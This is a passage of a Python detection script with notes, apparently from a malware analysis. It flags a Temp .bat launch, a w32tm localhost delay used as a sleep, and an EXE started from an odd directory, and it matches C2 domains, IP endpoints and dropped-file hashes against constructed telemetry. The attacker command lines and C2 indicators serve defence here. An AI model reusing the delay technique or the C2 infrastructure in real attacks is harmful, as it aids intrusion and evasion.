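def is_temp_bat_launch(cmdline):
    """cmd.exe /C "...\\Temp\\<name>.bat": the first step of the chain."""
    low = cmdline.lower()
    return ("cmd.exe" in low and " /c " in low and "\\temp\\" in low
            and low.rstrip('" ').endswith(".bat"))


def is_w32tm_sleep(cmdline):
    """w32tm /stripchart against localhost blocks for about /period seconds per
    /samples and yields nothing useful; treated here (editor's reading) as a
    LOLBin stand-in for sleep before the next stage starts."""
    low = cmdline.lower()
    return "w32tm" in low and "/stripchart" in low and "/computer:localhost" in low


def detect_delay_chain(proc_events):
    """Return (pid, [exe images]) for each cmd.exe that ran a Temp .bat,
    spawned the w32tm delay and then started an EXE outside BENIGN_ROOTS."""
    children = defaultdict(list)
    for ev in proc_events:
        children[ev["ppid"]].append(ev)
    hits = []
    for ev in proc_events:
        if not is_temp_bat_launch(ev["cmdline"]):
            continue
        kids = children[ev["pid"]]
        delayed = any(is_w32tm_sleep(k["cmdline"]) for k in kids)
        odd_exes = [k["image"] for k in kids
                    if k["image"].lower().endswith(".exe")
                    and not k["image"].lower().startswith(BENIGN_ROOTS)]
        if delayed and odd_exes:
            hits.append((ev["pid"], odd_exes))
    return hits


def match_network(net_events):
    """Flag lookups of the C2 domains and connections to the C2 endpoints."""
    hits = []
    for ev in net_events:
        if ev.get("domain", "").lower() in C2_DOMAINS:
            hits.append(("domain", ev["domain"]))
        if (ev.get("dst_ip"), ev.get("dst_port")) in C2_ENDPOINTS:
            hits.append(("endpoint", f'{ev["dst_ip"]}:{ev["dst_port"]}'))
    return hits


def match_files(file_events):
    """Flag known dropped-file hashes, then anything else written to the staging dir."""
    hits = []
    for ev in file_events:
        if ev["sha256"].lower() in DROPPED_SHA256:
            hits.append(("hash", ev["path"]))
        elif ev["path"].lower().startswith(STAGING_DIR + "\\"):
            hits.append(("staging_dir", ev["path"]))
    return hits


# --- constructed telemetry (not from the sandbox) ---------------------------
PROC_EVENTS = [
    {"pid": 100, "ppid": 50, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6py5WUoJqb.bat"'},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\system32\w32tm.exe",
     "cmdline": "w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2"},
    {"pid": 102, "ppid": 100, "image": r"C:\SavesDllcommon\System.exe",
     "cmdline": r'"C:\SavesDllcommon\System.exe"'},
    # Look-alike that must not fire: an admin checking time sync, no .bat, no dropped EXE.
    {"pid": 200, "ppid": 50, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /C w32tm /stripchart /computer:time.windows.com'},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\system32\w32tm.exe",
     "cmdline": "w32tm /stripchart /computer:time.windows.com"},
]
NET_EVENTS = [
    {"domain": "loss-winners.gl.at.ply.gg", "dst_ip": "8.8.8.8", "dst_port": 53},
    {"dst_ip": "147.185.221.19", "dst_port": 61007},
    {"domain": "update.example.net", "dst_ip": "203.0.113.10", "dst_port": 443},
]
FILE_EVENTS = [
    {"path": r"C:\SavesDllcommon\fontsaves.exe",
     "sha256": "8be76a2960a823f9284836868172eff28b64de44daba8b09f91ff678bb22d614"},
    {"path": r"C:\SavesDllcommon\other.dll", "sha256": "11" * 32},  # unknown hash, known dir
    {"path": r"C:\Users\Admin\Documents\notes.txt", "sha256": "22" * 32},
]

if __name__ == "__main__":
    for label, result in (("process chain", detect_delay_chain(PROC_EVENTS)),
                          ("network", match_network(NET_EVENTS)),
                          ("files", match_files(FILE_EVENTS))):
        print(f"{label}: {result}")
```

The chain rule keys on the combination (Temp .bat, localhost stripchart, EXE from an unusual root) rather than on w32tm alone, so a genuine time-sync check does not fire. On the network side, ply.gg hostnames are playit.gg tunnel endpoints, so 147.185.221.19:61007 can be reassigned to another tenant; match on the domain as well as the endpoint, and treat the staging-directory rule as the durable file indicator since the dropped names and hashes are easy for the operator to change.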